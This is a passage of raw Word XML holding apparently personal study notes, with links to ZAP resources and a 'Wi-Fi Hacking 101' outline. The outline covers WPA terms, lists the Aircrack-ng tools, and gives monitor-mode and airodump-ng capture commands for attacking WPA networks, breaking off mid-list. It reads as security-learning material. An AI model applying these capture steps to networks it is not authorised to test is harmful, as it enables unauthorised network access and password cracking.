        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="764C12CF" w14:textId="13448E3D" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId59" w:anchor="!forum/zaproxy-users" w:history="1">
        <w:r w:rsidR="008159D6" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://groups.google.com/forum/#!forum/zaproxy-users</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F46E37A" w14:textId="7E20B0D2" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidR="008159D6" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.alldaydevops.com/zap-in-ten</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B8D4DF1" w14:textId="13D24E23" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="008159D6" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44262B02" w14:textId="1C5638F5" w:rsidR="008159D6" w:rsidRPr="0084205E" w:rsidRDefault="00985D40" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wi-Fi Hacking 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D3BDC3" w14:textId="704621C5" w:rsidR="00985D40" w:rsidRPr="0084205E" w:rsidRDefault="00351F21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>An Intro to WPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8A835E" w14:textId="396BF1BE" w:rsidR="00351F21" w:rsidRPr="0084205E" w:rsidRDefault="00351F21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSID – network name seen when trying to connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D25D332" w14:textId="4871F327" w:rsidR="00351F21" w:rsidRPr="0084205E" w:rsidRDefault="00351F21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ESSID – an SSID that may apply to multiple access points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5689EC31" w14:textId="332858A7" w:rsidR="00351F21" w:rsidRPr="0084205E" w:rsidRDefault="00351F21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>BSSID – access point MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDDCC12" w14:textId="703E144D" w:rsidR="00351F21" w:rsidRPr="0084205E" w:rsidRDefault="00351F21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">WPA2-PSK – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> networks that you can connect to by providing a password that is the same for everyone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189DB2FB" w14:textId="5B0B947B" w:rsidR="00351F21" w:rsidRPr="0084205E" w:rsidRDefault="00351F21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">WPA2-EAP – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> networks that you can authenticate to by providing a username and password, sent to RADIUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664C1909" w14:textId="3A4D2931" w:rsidR="00351F21" w:rsidRPr="0084205E" w:rsidRDefault="00351F21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RADIUS – server for authenticating clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D321717" w14:textId="447A503C" w:rsidR="00351F21" w:rsidRPr="0084205E" w:rsidRDefault="00351F21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Core of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WPA(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>2) authentication is the 4-way handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364EBAF" w14:textId="6C902A4E" w:rsidR="00351F21" w:rsidRPr="0084205E" w:rsidRDefault="00351F21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">most home </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> networks use </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WPA(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>2) personal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B3D5D7" w14:textId="42910646" w:rsidR="00351F21" w:rsidRPr="0084205E" w:rsidRDefault="00351F21" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">if log in is required and it isn’t WEP, its </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WPA(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>2) personal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AA9394" w14:textId="3C12114B" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00932B8F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>username and password = WPA2-EAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E3088" w14:textId="39363BAA" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00932B8F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>can be brute forced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A40D39F" w14:textId="564DBBF2" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00932B8F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>keys for WPA are derived from both the ESSID and password for the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F300FD2" w14:textId="709BBE66" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00932B8F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ESSID acts as a salt – making dictionary attacks more difficult</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E44080" w14:textId="3FE7299D" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00932B8F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Capturing Packets to Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22343757" w14:textId="67918F54" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00932B8F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2DDC5D"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crack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796BA36A"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decap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31690C39"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mon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2606C425"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eplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F8652"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odump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF0F18C"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tun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6F6825"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packetforge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FB1694" w14:textId="77777777" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00932B8F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    airbase-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739DFC03"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decloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED9ED8A"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airolib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597A70B7" w14:textId="77777777" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00932B8F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>airserv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4943156A" w14:textId="77777777" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00932B8F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    buddy-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9963CB"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ivstools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="709625E1"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easside</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B381F59" w14:textId="77777777"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tkiptun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56348692" w14:textId="78C38CF6" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00932B8F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wesside</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0103A03F" w14:textId="4A7C3495" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00932B8F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">-ng, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">-ng, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng to attack WPA networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FA265A" w14:textId="5466C3B8" w:rsidR="00932B8F" w:rsidRPr="0084205E" w:rsidRDefault="00A7569D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">put interface wlan0 into monitor mode with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F5957" w14:textId="323C8D5A" w:rsidR="00A7569D" w:rsidRPr="0084205E" w:rsidRDefault="00A7569D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58079467" w14:textId="111177E1" w:rsidR="00A7569D" w:rsidRPr="0084205E" w:rsidRDefault="00A7569D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>new interface name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6630A8FC" w14:textId="0FF6916D" w:rsidR="00A7569D" w:rsidRPr="0084205E" w:rsidRDefault="00A7569D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0135B567" w14:textId="7E010183" w:rsidR="00A7569D" w:rsidRPr="0084205E" w:rsidRDefault="00A7569D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If other processes are using network adaptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A4035E" w14:textId="61487244" w:rsidR="00A7569D" w:rsidRPr="0084205E" w:rsidRDefault="00A7569D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng check kill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33547345" w14:textId="2E8B8D91" w:rsidR="00A7569D" w:rsidRPr="0084205E" w:rsidRDefault="00A7569D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To create a capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC2C68C" w14:textId="704FB7CA" w:rsidR="00A7569D" w:rsidRPr="0084205E" w:rsidRDefault="00A7569D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4AC156" w14:textId="6B5A70D9" w:rsidR="00A7569D" w:rsidRPr="0084205E" w:rsidRDefault="00A7569D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To set BSSID to monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A81724" w14:textId="5A89235C" w:rsidR="00A7569D" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>- -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A1E576A" w14:textId="10D10420" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To set channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D980BAD" w14:textId="0E407440" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>- -channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B87BFD" w14:textId="021BA645" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To capture packets to a file</w:t>
      </w:r>
    </w:p>
